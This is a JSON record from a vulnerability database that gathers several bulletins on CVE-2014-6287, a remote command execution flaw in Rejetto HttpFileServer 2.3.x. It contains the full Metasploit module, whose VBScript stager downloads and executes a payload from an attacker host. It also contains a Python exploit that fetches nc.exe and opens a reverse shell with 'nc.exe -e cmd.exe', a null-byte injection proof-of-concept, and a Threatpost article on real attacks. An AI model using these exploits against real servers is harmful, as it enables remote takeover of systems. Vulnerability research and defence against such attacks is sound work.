"https://packetstormsecurity.com/files/download/135122/rejettohttpserver-exec.txt"}, {"lastseen": "2016-12-05T22:13:29", "references": [], "edition": 1, "description": "", "reporter": "Daniele Linguaglossa", "published": "2014-09-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "HttpFileServer 2.3.x Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-09-12T00:00:00", "href": "https://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html", "id": "PACKETSTORM:128243", "sourceData": "`Affected software: http://sourceforge.net/projects/hfs/ \nVersion : 2.3x \n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution \n# Google Dork: intext:\"httpfileserver 2.3\" \n# Date: 11-09-2014 \n# Remote: Yes \n# Exploit Author: Daniele Linguaglossa \n# Vendor Homepage: http://rejetto.com/ \n# Software Link: http://sourceforge.net/projects/hfs/ \n# Version: 2.3.x \n# Tested on: Windows Server 2008 , Windows 8, Windows 7 \n# CVE : CVE-2014-6287 \n \nissue exists due to a poor regex in the file ParserLib.pas \n \n \nfunction findMacroMarker(s:string; ofs:integer=1):integer; \nbegin result:=reMatch(s, '\\{[.:]|[.:]\\}|\\|', 'm!', ofs) end; \n \n \nit will not handle null byte so a request to \n \nhttp://localhost:80/search=%00{.exec|cmd.} \n \nwill stop regex from parse macro , and macro will be executed and remote code injection happen. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128243/httpfileserver-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2018-09-17T23:53:30", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.", "reporter": "Rapid7", "published": "2014-10-08T16:55:33", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/rejetto_hfs_exec.rb", "type": "metasploit", "title": "Rejetto HttpFileServer Remote Command Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2018-09-15T23:54:45", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/WINDOWS/HTTP/REJETTO_HFS_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Rejetto HttpFileServer Remote Command Execution\",\n 'Description' => %q{\n Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\n poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\n over Windows XP SP3, Windows 7 SP1 and Windows 8.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery\n 'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-6287'],\n ['OSVDB', '111386'],\n ['URL', 'https://seclists.org/bugtraq/2014/Sep/85'],\n ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']\n ],\n 'Payload' => { 'BadChars' => \"\\x0d\\x0a\\x00\" },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n ],\n 'Privileged' => false,\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DisclosureDate' => \"Sep 11 2014\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path of the web application', '/']),\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),\n ])\n end\n\n def check\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => '/'\n })\n\n if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\\d.]+)/\n version = $1\n if Gem::Version.new(version) <= Gem::Version.new(\"2.3\")\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Safe\n end\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def on_request_uri(cli, req)\n print_status(\"Payload request received: #{req.uri}\")\n exe = generate_payload_exe\n vbs = Msf::Util::EXE.to_exe_vbs(exe)\n send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})\n # remove resource after serving 1st request as 'exec' execute 4x\n # during exploitation\n remove_resource(get_resource)\n end\n\n def autofilter\n true\n end\n\n def primer\n file_name = rand_text_alpha(rand(10)+5)\n file_ext = '.vbs'\n file_full_name = file_name + file_ext\n vbs_path = \"%TEMP%\\\\#{file_full_name}\"\n\n vbs_code = \"Set x=CreateObject(\\\"Microsoft.XMLHTTP\\\")\\x0d\\x0a\"\n vbs_code << \"On Error Resume Next\\x0d\\x0a\"\n vbs_code << \"x.Open \\\"GET\\\",\\\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\\\",False\\x0d\\x0a\"\n vbs_code << \"If Err.Number <> 0 Then\\x0d\\x0a\"\n vbs_code << \"wsh.exit\\x0d\\x0a\"\n vbs_code << \"End If\\x0d\\x0a\"\n vbs_code << \"x.Send\\x0d\\x0a\"\n vbs_code << \"Execute x.responseText\"\n\n payloads = [\n \"save|#{vbs_path}|#{vbs_code}\",\n \"exec|wscript.exe //B //NOLOGO #{vbs_path}\"\n ]\n\n print_status(\"Sending a malicious request to #{target_uri.path}\")\n payloads.each do |payload|\n send_request_raw({\n 'method' => 'GET',\n 'uri' => \"/?search=%00{.#{URI::encode(payload)}.}\"\n })\n end\n register_file_for_cleanup(vbs_path)\n end\n\n def exploit\n begin\n Timeout.timeout(datastore['HTTPDELAY']) { super }\n rescue Timeout::Error\n # When the server stops due to our timeout, this is raised\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/rejetto_hfs_exec.rb"}], "threatpost": [{"lastseen": "2016-09-04T20:46:47", "references": ["https://threatpost.com/onelogin-securenotes-breach-exposes-data-in-cleartext/120278/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--FHS-Null-Byte-Attack-%28CVE-2014-6287%29-Attempts-to-Install-DDoS-Malware-%28Iptablex%29/?page=1&year=0&month=0", "https://threatpost.com/unsecured-dnssec-easily-weaponized-researchers-warn/119969/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287", "https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fddos-exploit-targets-open-source-rejetto-hfs%2F111286%2F&text=The+exploit+tries+to+infect+Rejetto+users+with+the+IptabLes+DDoS+tool.+via+%40Threatpost", "https://threatpost.com/threatpost-news-wrap-august-19-2016/120003/"], "description": "Apparently no vulnerability is too small, no application too obscure, to escape a hacker\u2019s notice.\n\nA honeypot run by Trustwave\u2019s SpiderLabs research team recently snared an automated attack targeting users of the open source Rejetto HTTP File Server (Rejetto HFS). Someone was trying to exploit a vulnerability\u2014which has since been patched\u2014and install the well-known distributed denial-of-service tool IptabLes (unrelated to the Linux tool), also known as IptabLex.\n\n### Related Posts\n\n#### [OneLogin SecureNotes Breach Exposed Data in Cleartext](<https://threatpost.com/onelogin-securenotes-breach-exposes-data-in-cleartext/120278/> \"Permalink to OneLogin SecureNotes Breach Exposed Data in Cleartext\" )\n\nAugust 31, 2016 , 3:04 pm\n\n#### [Threatpost News Wrap, August 19, 2016](<https://threatpost.com/threatpost-news-wrap-august-19-2016/120003/> \"Permalink to Threatpost News Wrap, August 19, 2016\" )\n\nAugust 19, 2016 , 9:00 am\n\n#### [Unsecured DNSSEC Easily Weaponized, Researchers Warn](<https://threatpost.com/unsecured-dnssec-easily-weaponized-researchers-warn/119969/> \"Permalink to Unsecured DNSSEC Easily Weaponized, Researchers Warn\" )\n\nAugust 18, 2016 , 8:18 am\n\nRejetto HFS has been downloaded more than 24,000 times in the last seven days and according to the project\u2019s website has an estimated 12,500 users and is used as a file-sharing application as well as a webserver. It also runs on Wine, the Windows emulator for Linux systems.\n\n\u201cThis is just one snapshot, one request. This is one example to extrapolate and take a higher level view; there\u2019s likely a lot more activity out there,\u201d said Ryan Barnett, SpiderLabs lead researcher.\n\nIt\u2019s likely the attackers have simply incorporated this exploit into a larger attack platform, Barnett said.\n\n\u201cThat\u2019s the value of honeypots, spotting automated tools scanning the Internet shot-gunning exploits, and hoping it works,\u201d Barnett said.\n\nThe [exploit](<https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--FHS-Null-Byte-Attack-%28CVE-2014-6287%29-Attempts-to-Install-DDoS-Malware-%28Iptablex%29/?page=1&year=0&month=0>), sent from a possible compromised IP address in China, was targeting [CVE-2014-6287](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287>), a remote code execution bug in Rejetto. Specifically, the vulnerability affects Rejetto versions prior to 2.3c; the vulnerability is in the findMacroMarker function. Barnett said the exploit relies on a null byte character to trigger the attack code, which is written in Microsoft VBScript.\n\nOnce the exploit executes, it tries to connect to a pair of IP addresses hosted in Paris (123[.]108.109.100 and 178[.]33.196.164) on three ports: 80 (HTTP); 53 (DNS); and 443 (HTTPS). Barnett said only 178[.]33.196.164 remains online and is a malware repository responding to XML HTTP Requests (XHR) from the exploit.\n\n> The exploit tries to infect Rejetto users with the IptabLes DDoS tool. via @Threatpost\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fddos-exploit-targets-open-source-rejetto-hfs%2F111286%2F&text=The+exploit+tries+to+infect+Rejetto+users+with+the+IptabLes+DDoS+tool.+via+%40Threatpost>)\n\nA file called getsetup.exe is sent to the compromised server along with another executable, ko.exe, which drops IptabLes. Barnett said detection rates are high for the hash of getsetup.exe. IptabLes is a troublesome DDoS tool, capable of synflood and DNSflood attacks. It installs itself into boot for persistence, according to the SpiderLabs research, which added that IptabLes has been widely reported targeting Linux and Unix servers.\n\nThe vulnerability being targeted was submitted last September.\n\n\u201cIt\u2019s not very sophisticated, and a lot of times these types of attacks don\u2019t have to be,\u201d Barnett said. \u201cThese guys are concerned with scale because they\u2019re running botnets. What makes botnets so nice to the criminals running them is that they don\u2019t care to be stealthy. They can send attacks blindly, and if they\u2019re shut down, they just move on.\u201d", "edition": 1, "reporter": "Michael Mimoso", "published": "2015-02-26T10:01:00", "type": "threatpost", "title": "DDoS Exploit Targets Open Source Rejetto HFS", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "threatPostCategory": "Vulnerabilities", "bulletinFamily": "info", "cvelist": ["CVE-2014-6287"], "modified": "2015-03-02T20:23:10", "id": "DDOS-EXPLOIT-TARGETS-OPEN-SOURCE-REJETTO-HFS/111286", "href": "https://threatpost.com/ddos-exploit-targets-open-source-rejetto-hfs/111286/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-02T03:39:56", "references": [], "edition": 2, "description": "Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This Metasploit module exploit the HFS scripting commands by using '%00' to bypass the filtering. This Metasploit module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.", "reporter": "metasploit", "published": "2014-10-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "zdt", "title": "Rejetto HttpFileServer Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-10-09T00:00:00", "id": "1337DAY-ID-22733", "href": "https://0day.today/exploit/description/22733", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Rejetto HttpFileServer Remote Command Execution\",\r\n 'Description' => %q{\r\n Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\r\n poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by\r\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\r\n over Windows XP SP3, Windows 7 SP1 and Windows 8.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery\r\n 'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6287'],\r\n ['OSVDB', '111386'],\r\n ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],\r\n ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']\r\n ],\r\n 'Payload' => { 'BadChars' => \"\\x0d\\x0a\\x00\" },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n ],\r\n 'Privileged' => false,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => \"Sep 11 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path of the web application', '/']),\r\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => '/'\r\n })\r\n\r\n if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\\d.]+)/\r\n version = $1\r\n if Gem::Version.new(version) <= Gem::Version.new(\"2.3\")\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def on_request_uri(cli, req)\r\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\r\n exe = generate_payload_exe\r\n vbs = Msf::Util::EXE.to_exe_vbs(exe)\r\n send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})\r\n # remove resource after serving 1st request as 'exec' execute 4x\r\n # during exploitation\r\n remove_resource(get_resource)\r\n end\r\n\r\n def primer\r\n file_name = rand_text_alpha(rand(10)+5)\r\n file_ext = '.vbs'\r\n file_full_name = file_name + file_ext\r\n vbs_path = \"%TEMP%\\\\#{file_full_name}\"\r\n\r\n vbs_code = \"Set x=CreateObject(\\\"Microsoft.XMLHTTP\\\")\\x0d\\x0a\"\r\n vbs_code << \"On Error Resume Next\\x0d\\x0a\"\r\n vbs_code << \"x.Open \\\"GET\\\",\\\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\\\",False\\x0d\\x0a\"\r\n vbs_code << \"If Err.Number <> 0 Then\\x0d\\x0a\"\r\n vbs_code << \"wsh.exit\\x0d\\x0a\"\r\n vbs_code << \"End If\\x0d\\x0a\"\r\n vbs_code << \"x.Send\\x0d\\x0a\"\r\n vbs_code << \"Execute x.responseText\"\r\n\r\n payloads = [\r\n \"save|#{vbs_path}|#{vbs_code}\",\r\n \"exec|wscript.exe //B //NOLOGO #{vbs_path}\"\r\n ]\r\n\r\n print_status(\"Sending a malicious request to #{target_uri.path}\")\r\n payloads.each do |payload|\r\n send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => \"/?search=%00{.#{URI::encode(payload)}.}\"\r\n })\r\n end\r\n register_file_for_cleanup(vbs_path)\r\n end\r\n\r\n def exploit\r\n begin\r\n Timeout.timeout(datastore['HTTPDELAY']) { super }\r\n rescue Timeout::Error\r\n # When the server stops due to our timeout, this is raised\r\n end\r\n end\r\nend\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22733"}, {"lastseen": "2018-03-12T18:41:22", "references": [], "edition": 2, "description": "Exploit for windows platform in category remote exploits", "reporter": "Avinash Thapa", "published": "2016-01-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2016-01-04T00:00:00", "id": "1337DAY-ID-25379", "href": "https://0day.today/exploit/description/25379", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:\"httpfileserver 2.3\"\r\n# Date: 04-01-2016\r\n# Remote: Yes\r\n# Exploit Author: Avinash Kumar Thapa aka \"-Acid\"\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n# Description: You can use HFS (HTTP File Server) to send and receive files.\r\n# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.\r\n# It also differs from classic web servers because it's very easy to use and runs \"right out-of-the box\". Access your remote files, over the network. It has been successfully tested with Wine under Linux. \r\n \r\n#Usage : python Exploit.py <Target IP address> <Target Port Number>\r\n \r\n#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). \r\n# You may need to run it multiple times for success!\r\n \r\n \r\nimport urllib2\r\nimport sys\r\n \r\ntry:\r\n def script_create():\r\n urllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+save+\".}\")\r\n \r\n def execute_script():\r\n urllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe+\".}\")\r\n \r\n def nc_run():\r\n urllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe1+\".}\")\r\n \r\n ip_addr = \"192.168.44.128\" #local IP address\r\n local_port = \"443\" # Local Port number\r\n vbs = \"C:\\Users\\Public\\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F\"+ip_addr+\"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with\"\r\n save= \"save|\" + vbs\r\n vbs2 = \"cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs\"\r\n exe= \"exec|\"+vbs2\r\n vbs3 = \"C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20\"+ip_addr+\"%20\"+local_port\r\n exe1= \"exec|\"+vbs3\r\n script_create()\r\n execute_script()\r\n nc_run()\r\nexcept:\r\n print \"\"\"[.]Something went wrong..!\r\n Usage is :[.] python exploit.py <Target IP address> <Target Port Number>\r\n Don't forgot to change the Local IP address and Port number on the script\"\"\"\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/25379"}, {"lastseen": "2018-04-13T09:41:32", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "reporter": "Daniele Linguaglossa", "published": "2014-09-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "HttpFileServer 2.3.x Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-09-13T00:00:00", "id": "1337DAY-ID-22640", "href": "https://0day.today/exploit/description/22640", "sourceData": "Affected software: http://sourceforge.net/projects/hfs/\r\nVersion : 2.3x\r\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:\"httpfileserver 2.3\"\r\n# Date: 11-09-2014\r\n# Remote: Yes\r\n# Exploit Author: Daniele Linguaglossa\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n\r\nissue exists due to a poor regex in the file ParserLib.pas\r\n\r\n\r\nfunction findMacroMarker(s:string; ofs:integer=1):integer;\r\nbegin result:=reMatch(s, '\\{[.:]|[.:]\\}|\\|', 'm!', ofs) end;\r\n\r\n\r\nit will not handle null byte so a request to\r\n\r\nhttp://localhost:80/search=%00{.exec|cmd.}\r\n\r\nwill stop regex from parse macro , and macro will be executed and remote code injection happen.\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22640"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\nAffected software: http://sourceforge.net/projects/hfs/\r\nVersion : 2.3x\r\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:"httpfileserver 2.3"\r\n# Date: 11-09-2014\r\n# Remote: Yes\r\n# Exploit Author: Daniele Linguaglossa\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n\r\nissue exists due to a poor regex in the file ParserLib.pas\r\n\r\n\r\nfunction findMacroMarker(s:string; ofs:integer=1):integer;\r\nbegin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;\r\n\r\n\r\nit will not handle null byte so a request to\r\n\r\nhttp://localhost:80/search=%00{.exec|cmd.}\r\n\r\nwill stop regex from parse macro , and macro will be executed and remote code injection happen.\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-15T00:00:00", "title": "HttpFileServer 2.3.x Remote Command Execution", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-6287"], "modified": "2014-10-15T00:00:00", "id": "SECURITYVULNS:DOC:31217", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31217", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}